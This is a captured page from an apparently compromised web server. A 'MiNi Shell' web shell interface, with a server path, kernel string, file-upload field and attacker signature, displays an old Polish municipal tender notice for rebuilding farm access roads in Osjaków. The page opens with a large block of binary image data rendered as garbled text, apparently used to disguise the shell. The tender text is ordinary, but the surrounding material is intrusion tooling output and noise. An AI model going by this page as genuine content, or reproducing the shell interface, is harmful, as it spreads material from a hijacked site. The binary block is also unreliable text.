JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090716/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090716/113673-N-2009.html

<p class="kh_header"><b>Osjaków: Przebudowa dróg dojazdowych do gruntów rolnych w miejscowościach:
1)	Drobnice - Kolonia Zagóry o długości - 900 m
2)	Felinów (etap II) o długości - 1 800 m</b><br>
<b>Numer ogłoszenia: 113673 - 2009; data zamieszczenia: 16.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Osjaków , ul. Targowa 26, 98-320 Osjaków, woj. łódzkie, tel. (043) 842 33 91, faks (043) 842 33 91 w. 31.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.osjakow.bip.net.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa dróg dojazdowych do gruntów rolnych w miejscowościach:
1)	Drobnice - Kolonia Zagóry o długości - 900 m
2)	Felinów (etap II) o długości - 1 800 m.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Przebudowa dróg dojazdowych do gruntów rolnych 
w miejscowościach:
1)	Drobnice - Kolonia  Zagóry o długości  - 900 m
2)	Felinów (etap II) o długości - 1 800 m.
Przedmiot zamówienia obejmuje roboty przygotowawcze, wykonanie podbudowy i nawierzchni przedmiotowych dróg.
W miejscowości Felinów (etap II) na odcinku drogi o długości 1 800 m i szerokości 4,0 m należy na istniejącej podbudowie z żużla wielkopiecowego wykonać podbudowę z kruszywa drogowego łamanego o grubości 8 cm , oraz nawierzchnię z destruktu asfaltowego o grubości 5 cm, z powierzchniowym utrwaleniem  nawierzchni  emulsją  asfaltową (grysy kamienne o wymiarach 8-11 mm, w ilości 13,0 dm3 kruszywa na m3). Droga gminna zlokalizowana w obrębie geodezyjnym Felinów - dz. ewid. nr 116 oraz w obrębie geodezyjnym Osjaków - dz. ewid. nr 723.
	W miejscowości Drobnice - Kolonia Zagóry na całej długości, tj. 900 m  należy wykonać podbudowę z kruszywa drogowego o warstwie 10 cm oraz klinowanie nawierzchni kruszywem drogowym o przeciętnej grubości 4,0 cm. Łączna grubość konstrukcji - 14 cm. Droga usytuowana jest na działce oznaczonej ewid. nr 1068, od drogi gminnej  - dz. ewid. nr 1069 do drogi gminnej - dz. ewid. nr 2038. 
Zakres zamówienia  obejmuje również zabezpieczenie urządzeń i sieci istniejących,
sporządzenie lub zapewnienie planu bezpieczeństwa i ochrony zdrowia,  jeżeli jest wymagany dla danego rodzaju robót, zgodnie z art. 21a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz. U. z 2006 r. Nr 156, poz. 1118 z późn. zm.), uzyskanie protokołów odbiorów koniecznych do oddania dróg w użytkowanie.
Wykonawca zobowiązany jest wykonać przedmiot zamówienia z własnych materiałów.
Zakres rzeczowy przedsięwzięcia będącego przedmiotem zamówienia opisany jest uproszczonej dokumentacji technicznej projektu przebudowy drogi rolniczej w Drobnicach - Kolonia Zagóry i w miejscowości Felinów (etap II) oraz w przedmiarze robót, na bazie którego należy opracować kosztorys ofertowy.  Pozycje katalogowe, określone w przedmiarze robót,  podano wyłącznie dla ułatwienia sporządzenia kalkulacji - stosowanie ich do wyceny nie jest obligatoryjne. Wykonawca przedstawi ceny jednostkowe i ogółem za wykonanie robót. Specyfikacje techniczne i przedmiary robót stanowią załączniki do niniejszej specyfikacji. Przedmiot zamówienia należy wykonać zgodnie z przedstawioną dokumentacją techniczną, SIWZ, specyfikacją techniczną wykonania i odbioru robót, z należytą starannością, zasadami wiedzy technicznej oraz zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (tj. dz. U z 2006 r. Nr 156, poz. 1118 z późn. zm.). Wykonawca jest odpowiedzialny i zobowiązany na własny koszt do należytego utrzymania placu budowy oraz zapewnienia bezpieczeństwa pracownikom. Odpady budowlane, które powstaną w trakcie realizacji zamówienia Wykonawca zagospodaruje we własnym zakresie i zgodnie z obowiązującymi przepisami. Po stronie wykonawcy pozostają koszty wszystkich badań potrzebnych do udokumentowania wymaganej jakości wykonywanych robót i wbudowanych materiałów. Wykonawca ponosi wszelkie koszty związane z realizacją zadania w zakresie prac zgodnie z kosztorysem ofertowym i dokumentacją, a także inne koszty niezbędne do wykonania przedmiotowego zamówienia, m.in. :materiałów o parametrach technicznych, konstrukcyjnych i użytkowych nie gorszych od opisanych w projektach technicznych, odszkodowań za ewentualne zniszczenia dokonane podczas prowadzenia robót, uporządkowania terenu w pasie technologicznym robót i placu budowy po zakończeniu wykonywania prac. Wykonawca zobowiązany jest przedstawić kosztorys powykonawczy wykonania przedmiotu zamówienia. Zamawiający zaleca dokonanie wizji terenu, gdzie będą prowadzone roboty budowlane, w celu uzyskania ewentualnie dodatkowych informacji niezbędnych do prawidłowego opracowania oferty. Zamawiający dopuszcza zlecenie wykonania części przedmiotu zamówienia podwykonawcom, za wyjątkiem prac związanych z wykonaniem nawierzchni dróg. Zakres robót i ich wartość w przypadku powierzenia wykonania części zamówienia podwykonawcom, należy wskazać w formularzu oferty, a szczegółowy opis udziału podwykonawców w realizacji umowy określa § 5 projektu umowy (załącznik nr 4 do SIWZ). Jeżeli Wykonawca nie wskaże w ofercie, którą część zamówienia zamierza powierzyć podwykonawcom zamawiający uzna, że zamówienie będzie realizowane bez udziału podwykonawców. Ponadto Wykonawca jest odpowiedzialny za działania, uchybienia i zaniedbania podwykonawcy i jego pracowników w takim samym zakresie i stopniu jak byłyby to działania, uchybienia i zaniedbania jego własnych pracowników..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7, 45.11.27.30-1, 45.23.31.20-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający żąda, przed upływem terminu składania ofert, wniesienia wadium w wysokości - 4.000,00 zł (słownie: cztery tysiące złotych).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki:
a)	wykażą się doświadczeniem zawodowym w zakresie realizacji robót
porównywalnych z   przedmiotem   zamówienia; udokumentują   zrealizowanie
w ostatnich pięciu latach co najmniej 2 tożsamych robót, które swoim rodzajem i wartością odpowiadają przedmiotowi zamówienia wraz z potwierdzeniem, że roboty te zostały wykonane należycie, 
         Za tożsame Zamawiający uzna roboty budowlane polegające na wykonaniu podbudowy z kruszyw łamanych drogowych, ułożeniu nawierzchni drogowej z destruktu asfaltowego oraz powierzchniowym utrwaleniu tej nawierzchni emulsją asfaltową.  
b)	zapewnią nadzór co najmniej 1 kierownika budowy posiadającego stosowne uprawnienia budowlane w branżach odpowiadających zakresowi zamówienia, wraz z potwierdzeniem przynależności do samorządowej izby zawodowej techników i inżynierów budownictwa,
c)	posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej
działalności gospodarczej, na kwotę nie mniejszą niż 50% oferowanej ceny brutto zamówienia, 
d)	udzielą co najmniej 24 miesięcznej gwarancji na wykonane roboty,
e)	nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust l i 2 ustawy Prawo zamówień publicznych, 
f)      spełniają  wymagania   określone   w   art.   22   ust   l   ustawy  Prawo   zamówień publicznych, 
g)     wniosą wymagane wadium. 
2. Sposób dokonywania oceny spełniania warunków wymaganych od Wykonawców określony został według formuły spełnia - nie spełnia. Niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania. 
3. Ocena spełniania warunków podmiotowych dokonywana będzie wyłącznie na podstawie dokumentów żądanych w SIWZ i przedstawionych w ofercie. Z treści załączonych dokumentów musi jednoznacznie wynikać, iż wyżej wymienione warunki Wykonawca spełnia. Zamawiający wzywa wykonawców, którzy w określonym terminie nie złożyli dokumentów i oświadczeń  lub złożone dokumenty i oświadczenia zawierają błędy, do ich uzupełnienia, chyba, że mimo ich uzupełnienia oferta wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania. Dokumenty i oświadczenia powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu, potwierdzać, że oferowane przez Wykonawcę roboty budowlane spełniają wymagania określone przez Zamawiającego,nie później niż w dniu, w którym upłynął termin składania ofert -art. 26 ust. 3 ustawy. Nie spełnienie jednego z ww warunków skutkować będzie wykluczeniem wykonawcy z postępowania (art. 24 ust. 2 pkt 3 ustawy), ofertę Wykonawcy wykluczonego uznaje się za odrzuconą (art. 24 ust. 2 pkt 4 ustawy)..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dla udokumentowania spełnienia wymaganych warunków oraz uznania ważności, oferta musi zawierać następujące dokumenty lub poświadczone przez Wykonawcę za zgodność z oryginałem ich kopie:
a)	ofertę zgodną z formularzem oferty stanowiącym załącznik nr 1 do SIWZ,
b)	oświadczenie wykonawcy w trybie art. 22 ust l  ustawy Prawo zamówień publicznych, (załącznik nr 2 do SIWZ) 
c)	oświadczenie wykonawcy w trybie art. 24 ust. 1 i ust. 2 ustawy Prawo zamówień publicznych, (załącznik nr 3 do SIWZ),
d)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do
ewidencji działalności gospodarczej - wystawiony nie wcześniej niż 6 miesięcy
przed upływem terminu składania ofert,
e)	zaświadczenie właściwego urzędu skarbowego oraz właściwego oddziału zakładu
ubezpieczeń społecznych lub kasy rolniczego ubezpieczenia społecznego, potwierdzające odpowiednio, że wykonawca nie zalega z opłaceniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
f)	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust 1 pkt 4-8 ustawy Prawo zamówień publicznych - wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
g)	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust 1 pkt 9 ustawy Prawo zamówień publicznych - wystawioną nie wcześniej niż 6
miesięcy przed upływem terminu składania ofert
h)	kosztorys ofertowy zawierający wszystkie pozycje przedmiaru robót,
i)	informację na temat przeciętnej  liczby zatrudnionych pracowników w ostatnich
3 latach, a w przypadku gdy okres prowadzenia działalności był krótszy - w tym
okresie,
j)	dane na temat kierownika budowy oraz innych osób sprawujących nadzór nad
 robotami w poszczególnych branżach, wraz uprawnieniami i dokumentami
potwierdzającymi ich przynależność do izby zawodowej inżynierów i techników
budownictwa, 
k)   wykaz wykonanych w okresie ostatnich 5 lat robót budowlanych (jeżeli okres prowadzenia działalności jest krótszy, to za cały ten okres ) 2 tożsamych robót budowlanych odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości, daty, miejsca wykonania oraz nazwy inwestora; wraz z dokumentami potwierdzającymi, że roboty te zostały wykonane należycie, 
l)  wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakimi dysponuje wykonawca,
ł)  polisę lub  inny dokument ubezpieczenia potwierdzającego,  że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, na kwotę nie mniejsza niż 50% oferowanej ceny brutto zamówienia
m)  dowód wniesienia wadium 
n)   atest na kruszywo.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.osjakow.bip.net.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy
98 - 320 Osjaków, ul. Targowa 26.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.08.2009 godzina 10:00, miejsce: Urząd Gminy w Osjakowie, ul. Targowa 26, pokój nr 6 (sekretariat, I piętro).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com